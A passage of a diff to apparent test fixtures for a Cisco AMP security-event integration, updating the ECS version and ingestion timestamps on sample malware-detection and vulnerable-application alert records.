Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1541,7 +1541,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1569,7 +1569,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469643984Z", + "ingested": "2021-09-13T18:06:41.546116850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1629,7 +1629,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1649,7 +1649,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469646010Z", + "ingested": "2021-09-13T18:06:41.546119034Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "kind": "alert", "start": "2021-01-15T10:22:29.000Z", @@ -1710,7 +1710,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1742,7 +1742,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469647897Z", + "ingested": "2021-09-13T18:06:41.546121122Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1799,7 +1799,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1827,7 +1827,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469649781Z", + "ingested": "2021-09-13T18:06:41.546123192Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1884,7 +1884,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1912,7 +1912,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469651657Z", + "ingested": "2021-09-13T18:06:41.546125243Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1969,7 +1969,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2001,7 +2001,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469653537Z", + "ingested": "2021-09-13T18:06:41.546127347Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2058,7 +2058,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2090,7 +2090,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469655428Z", + "ingested": "2021-09-13T18:06:41.546129388Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2147,7 +2147,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2175,7 +2175,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469657309Z", + "ingested": "2021-09-13T18:06:41.546131467Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2232,7 +2232,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2260,7 +2260,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469659269Z", + "ingested": "2021-09-13T18:06:41.546133663Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2319,7 +2319,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2339,7 +2339,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:31:04.469661163Z", + "ingested": "2021-09-13T18:06:41.546135710Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "kind": "alert", "start": "2021-01-15T10:20:00.000Z", @@ -2410,7 +2410,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2442,7 +2442,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469663071Z", + "ingested": "2021-09-13T18:06:41.546137800Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2499,7 +2499,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2527,7 +2527,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469664950Z", + "ingested": "2021-09-13T18:06:41.546139831Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2584,7 +2584,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2612,7 +2612,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469666839Z", + "ingested": "2021-09-13T18:06:41.546141890Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2669,7 +2669,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2701,7 +2701,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469668742Z", + "ingested": "2021-09-13T18:06:41.546143930Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2758,7 +2758,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
